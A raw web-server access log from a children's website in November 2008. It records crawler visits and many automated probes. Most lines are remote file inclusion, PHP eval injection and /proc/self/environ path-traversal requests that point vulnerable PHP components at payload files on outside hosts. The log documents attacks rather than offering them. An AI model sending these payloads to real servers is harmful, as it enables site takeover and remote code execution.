70.85.149.242 - - [20/Nov/2008:23:07:14 -0700] "GET /logs/access_log//administrator/components/com_webring/admin.webring.docs.php?component_dir=www.geocities.com/kucluk_pamungkas/id.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.819" "-"
70.85.149.242 - - [20/Nov/2008:23:07:15 -0700] "GET //administrator/components/com_webring/admin.webring.docs.php?component_dir=www.geocities.com/kucluk_pamungkas/id.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.819" "-"
70.85.149.242 - - [20/Nov/2008:23:07:15 -0700] "GET /logs//administrator/components/com_webring/admin.webring.docs.php?component_dir=www.geocities.com/kucluk_pamungkas/id.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.819" "-"
70.85.149.242 - - [20/Nov/2008:23:09:15 -0700] "GET /logs/access_log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.819" "-"
70.85.149.242 - - [20/Nov/2008:23:09:15 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.819" "-"
70.85.149.242 - - [20/Nov/2008:23:09:15 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.819" "-"
70.85.149.242 - - [20/Nov/2008:23:10:41 -0700] "GET /logs/access_log.old/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.contactosteune.com/server/pro/iddd.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "-"
70.85.149.242 - - [20/Nov/2008:23:10:41 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.contactosteune.com/server/pro/iddd.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "-"
70.85.149.242 - - [20/Nov/2008:23:10:46 -0700] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.contactosteune.com/server/pro/iddd.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "-"
70.85.149.242 - - [20/Nov/2008:23:11:18 -0700] "GET /logs/access_log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=www.geocities.com/kucluk_pamungkas/id.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.819" "-"
70.85.149.242 - - [20/Nov/2008:23:11:18 -0700] "GET //administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=www.geocities.com/kucluk_pamungkas/id.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.819" "-"
70.85.149.242 - - [20/Nov/2008:23:11:19 -0700] "GET /logs//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=www.geocities.com/kucluk_pamungkas/id.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.819" "-"
70.85.149.242 - - [20/Nov/2008:23:11:31 -0700] "GET /logs/access_log.old//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=www.geocities.com/kucluk_pamungkas/id.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.819" "-"
70.85.149.242 - - [20/Nov/2008:23:11:31 -0700] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=www.geocities.com/kucluk_pamungkas/id.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.819" "-"
70.85.149.242 - - [20/Nov/2008:23:11:31 -0700] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=www.geocities.com/kucluk_pamungkas/id.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.819" "-"
72.30.79.43 - - [20/Nov/2008:23:12:09 -0700] "GET /images/parks/?N=D HTTP/1.0" 200 1717 www.wnckids.com "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "-"
72.46.126.214 - - [20/Nov/2008:23:14:22 -0700] "GET //modules/xfsection/modify.php?dir_module=http://www.jeondae.es.kr/bbs//skin/zero_vote/ooid.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.803" "-"
64.1.215.165 - - [20/Nov/2008:23:15:36 -0700] "GET /images/animalsinsects/_vti_cnf/?S=D HTTP/1.0" 200 656 www.wnckids.com "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "-"
70.85.149.242 - - [20/Nov/2008:23:16:44 -0700] "GET /logs/access_log//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.819" "-"
70.85.149.242 - - [20/Nov/2008:23:16:45 -0700] "GET //administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.819" "-"
70.85.149.242 - - [20/Nov/2008:23:16:45 -0700] "GET /logs//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.819" "-"
70.85.149.242 - - [20/Nov/2008:23:16:54 -0700] "GET /logs/error_log.old//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.819" "-"
70.85.149.242 - - [20/Nov/2008:23:16:54 -0700] "GET //administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.819" "-"
70.85.149.242 - - [20/Nov/2008:23:16:54 -0700] "GET /logs//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.819" "-"
38.99.44.103 - - [20/Nov/2008:23:18:38 -0700] "GET /ads/popupads/_vti_cnf/?S=D HTTP/1.0" 200 633 www.wnckids.com "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "-"
70.85.149.242 - - [20/Nov/2008:23:19:50 -0700] "GET /logs/access_log.old//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.819" "-"
70.85.149.242 - - [20/Nov/2008:23:19:51 -0700] "GET //administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.819" "-"
70.85.149.242 - - [20/Nov/2008:23:19:51 -0700] "GET /logs//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.819" "-"
85.236.53.4 - - [20/Nov/2008:23:24:39 -0700] "GET /logs//index.php?start=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "-"
85.236.53.4 - - [20/Nov/2008:23:24:39 -0700] "GET //index.php?start=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "-"
85.236.53.4 - - [20/Nov/2008:23:24:39 -0700] "GET /logs/referer_log//index.php?start=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "-"
70.85.149.242 - - [20/Nov/2008:23:25:53 -0700] "GET /logs/access_log.old//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=www.geocities.com/kucluk_pamungkas/id.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.819" "-"
70.85.149.242 - - [20/Nov/2008:23:25:53 -0700] "GET //administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=www.geocities.com/kucluk_pamungkas/id.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.819" "-"
70.85.149.242 - - [20/Nov/2008:23:25:54 -0700] "GET /logs//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=www.geocities.com/kucluk_pamungkas/id.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.819" "-"
70.85.149.242 - - [20/Nov/2008:23:26:47 -0700] "GET /logs/error_log.old//administrator/components/com_webring/admin.webring.docs.php?component_dir=www.geocities.com/kucluk_pamungkas/id.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.819" "-"
70.85.149.242 - - [20/Nov/2008:23:27:10 -0700] "GET /logs/access_log.old//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.819" "-"
70.85.149.242 - - [20/Nov/2008:23:27:11 -0700] "GET //administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.819" "-"
70.85.149.242 - - [20/Nov/2008:23:27:11 -0700] "GET /logs//administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.819" "-"
70.85.149.242 - - [20/Nov/2008:23:30:53 -0700] "GET /logs/access_log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=www.geocities.com/kucluk_pamungkas/id.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.819" "-"
70.85.149.242 - - [20/Nov/2008:23:30:53 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=www.geocities.com/kucluk_pamungkas/id.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.819" "-"
70.85.149.242 - - [20/Nov/2008:23:30:53 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=www.geocities.com/kucluk_pamungkas/id.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.819" "-"
201.238.223.156 - - [20/Nov/2008:23:32:18 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.65" "-"
201.238.223.156 - - [20/Nov/2008:23:32:24 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.65" "-"
87.106.245.44 - - [20/Nov/2008:23:35:07 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
87.106.245.44 - - [20/Nov/2008:23:35:07 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
87.106.245.44 - - [20/Nov/2008:23:35:07 -0700] "GET /logs/access_log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
87.106.245.44 - - [20/Nov/2008:23:35:23 -0700] "GET /logs/error_log.old/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
64.34.166.205 - - [20/Nov/2008:23:39:44 -0700] "GET /logs/config.inc.php?path_escape=http://www.graynwhite.com/phpauction/data/file/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "-"
64.34.166.205 - - [20/Nov/2008:23:39:44 -0700] "GET /config.inc.php?path_escape=http://www.graynwhite.com/phpauction/data/file/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "-"
64.34.166.205 - - [20/Nov/2008:23:40:51 -0700] "GET /config.php?fpath=http://www.graynwhite.com/phpauction/data/file/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "-"
64.34.166.205 - - [20/Nov/2008:23:40:51 -0700] "GET /logs/config.php?fpath=http://www.graynwhite.com/phpauction/data/file/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "-"
210.245.166.92 - - [20/Nov/2008:23:41:42 -0700] "GET //index.php?start=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "-"
210.245.166.92 - - [20/Nov/2008:23:41:42 -0700] "GET /logs/referer_log//index.php?start=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "-"
210.245.166.92 - - [20/Nov/2008:23:41:42 -0700] "GET /logs//index.php?start=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt??? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "-"
64.1.215.165 - - [20/Nov/2008:23:41:55 -0700] "GET /hrfc.htm HTTP/1.0" 404 - www.wnckids.com "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "-"
219.85.63.226 - - [20/Nov/2008:23:44:23 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.graynwhite.com/phpauction/data/file/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "-"
219.85.63.226 - - [20/Nov/2008:23:44:23 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.graynwhite.com/phpauction/data/file/id.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "-"
201.30.20.130 - - [20/Nov/2008:23:52:21 -0700] "GET /logs/errors.php?error=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
201.30.20.130 - - [20/Nov/2008:23:52:23 -0700] "GET /errors.php?error=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
201.238.223.156 - - [20/Nov/2008:23:53:50 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.65" "-"
81.169.169.99 - - [20/Nov/2008:23:55:31 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - www.wnckids.com "-" "XXXXXX" "-"
81.169.169.99 - - [20/Nov/2008:23:55:31 -0700] "GET /logs/errors.php?error=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "-"
81.169.169.99 - - [20/Nov/2008:23:55:31 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "-"
81.169.169.99 - - [20/Nov/2008:23:55:31 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - www.wnckids.com "-" "XXXXXX" "-"
81.169.169.99 - - [20/Nov/2008:23:55:32 -0700] "GET //classes/adodbt/sql.php?classes_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 - www.wnckids.com "-" "XXXXXX" "-"
81.169.169.99 - - [20/Nov/2008:23:55:32 -0700] "GET /errors.php?error=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "-"
81.169.169.99 - - [20/Nov/2008:23:55:32 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.kvsc.ru/files/i?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "-"
81.169.169.99 - - [20/Nov/2008:23:55:48 -0700] "GET //classes/adodbt/sql.php?classes_dir=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - www.wnckids.com "-" "XXXXXX" "-"
69.73.138.108 - - [20/Nov/2008:23:56:04 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.e3.co.za/kroon/phpmail/osid6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.812" "-"
69.73.138.108 - - [20/Nov/2008:23:56:17 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.e3.co.za/kroon/phpmail/osid6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.812" "-"
69.73.138.108 - - [20/Nov/2008:23:56:17 -0700] "GET /logs/access_log.old/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.e3.co.za/kroon/phpmail/osid6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.812" "-"
69.73.138.108 - - [20/Nov/2008:23:57:16 -0700] "GET /logs/error_log.old/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.e3.co.za/kroon/phpmail/osid6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.812" "-"
72.30.79.115 - - [20/Nov/2008:23:58:09 -0700] "GET /robots.txt HTTP/1.0" 404 - www.wnckids.com "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "-"
72.30.79.115 - - [20/Nov/2008:23:58:37 -0700] "GET /images/adimages/?N=A HTTP/1.0" 200 10325 www.wnckids.com "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "-"
72.30.79.115 - - [20/Nov/2008:23:59:20 -0700] "GET /images/adimages/?N=A HTTP/1.0" 200 10325 www.wnckids.com "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "-"
69.73.138.108 - - [20/Nov/2008:23:59:46 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.e3.co.za/kroon/phpmail/osid6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.812" "-"
69.73.138.108 - - [20/Nov/2008:23:59:56 -0700] "GET /logs/access_log.old//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.e3.co.za/kroon/phpmail/osid6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.812" "-"
69.73.138.108 - - [21/Nov/2008:00:00:08 -0700] "GET /logs/access_log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.e3.co.za/kroon/phpmail/osid6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.812" "-"
69.73.138.108 - - [21/Nov/2008:00:00:14 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.e3.co.za/kroon/phpmail/osid6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.812" "-"
69.73.138.108 - - [21/Nov/2008:00:06:07 -0700] "GET /logs/access_log.old//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.e3.co.za/kroon/phpmail/osid6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.812" "-"
69.73.138.108 - - [21/Nov/2008:00:06:07 -0700] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.e3.co.za/kroon/phpmail/osid6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.812" "-"
69.73.138.108 - - [21/Nov/2008:00:06:07 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.e3.co.za/kroon/phpmail/osid6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.812" "-"
201.30.20.130 - - [21/Nov/2008:00:06:07 -0700] "GET /logs/access_log/errors.php?error=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/5.0" "-"
69.73.138.108 - - [21/Nov/2008:00:06:28 -0700] "GET /logs/access_log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.e3.co.za/kroon/phpmail/osid6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.812" "-"
64.1.215.165 - - [21/Nov/2008:00:07:57 -0700] "GET /images/?D=D HTTP/1.0" 200 10943 www.wnckids.com "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "-"
69.73.138.108 - - [21/Nov/2008:00:09:53 -0700] "GET /logs/access_log.old%20//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.e3.co.za/kroon/phpmail/osid6.txt?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.812" "-"
210.59.227.15 - - [21/Nov/2008:00:12:52 -0700] "GET /logs//com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
210.59.227.15 - - [21/Nov/2008:00:12:53 -0700] "GET //com_rssreader/admin.rssreader.php?mosConfig_live_site=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
61.8.3.74 - - [21/Nov/2008:00:13:59 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.813" "-"
61.8.3.74 - - [21/Nov/2008:00:14:00 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.813" "-"
79.66.122.135 - - [21/Nov/2008:00:17:30 -0700] "GET /parkspools.htm HTTP/1.1" 404 - www.wnckids.com "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" "-"
61.8.3.74 - - [21/Nov/2008:00:19:01 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.813" "-"
65.55.210.208 - - [21/Nov/2008:00:22:05 -0700] "GET /robots.txt HTTP/1.1" 404 - www.wnckids.com "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "-"
65.55.210.208 - - [21/Nov/2008:00:22:06 -0700] "GET /logs/?D=A HTTP/1.1" 200 966 www.wnckids.com "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "-"
61.8.3.74 - - [21/Nov/2008:00:24:08 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.813" "-"
72.30.79.115 - - [21/Nov/2008:00:26:33 -0700] "GET /images/movieposters/?M=D HTTP/1.0" 200 6624 www.wnckids.com "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "-"
210.59.227.15 - - [21/Nov/2008:00:28:33 -0700] "GET //administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
61.8.3.74 - - [21/Nov/2008:00:30:07 -0700] "GET /logs/access_log.old//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.813" "-"
61.8.3.74 - - [21/Nov/2008:00:30:08 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.813" "-"
61.8.3.74 - - [21/Nov/2008:00:30:08 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.813" "-"
203.81.221.87 - - [21/Nov/2008:00:35:45 -0700] "GET /images/gho1g.jpg HTTP/1.0" 200 22978 www.wnckids.com "http://boards.shape.com/ib/ikonboard.cgi?act=Print;f=3;t=186664" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; InfoPath.2)" "-"
210.59.227.15 - - [21/Nov/2008:00:38:38 -0700] "GET /logs//administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
210.59.227.15 - - [21/Nov/2008:00:38:38 -0700] "GET //administrator/components/com_ongumatimesheet20/lib/onguma.class.php?mosConfig_absolute_path=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
72.30.79.115 - - [21/Nov/2008:00:40:34 -0700] "GET /wwwstat/2007.Feb.usage.html HTTP/1.0" 200 9550 www.wnckids.com "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "-"
65.55.210.220 - - [21/Nov/2008:00:41:51 -0700] "GET /robots.txt HTTP/1.1" 404 - www.wnckids.com "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "-"
65.55.210.220 - - [21/Nov/2008:00:41:53 -0700] "GET /?M=A HTTP/1.1" 200 1047 www.wnckids.com "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "-"
210.59.227.15 - - [21/Nov/2008:00:44:09 -0700] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.811" "-"
67.195.37.107 - - [21/Nov/2008:00:44:47 -0700] "GET /logs/?S=A HTTP/1.0" 200 1074 www.wnckids.com "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "-"
87.106.245.44 - - [21/Nov/2008:00:49:14 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://mozac.edu.my//lib/.../idscan8%0D?? HTTP/1.1" 404 - www.wnckids.com "-" "libwww-perl/5.805" "-"
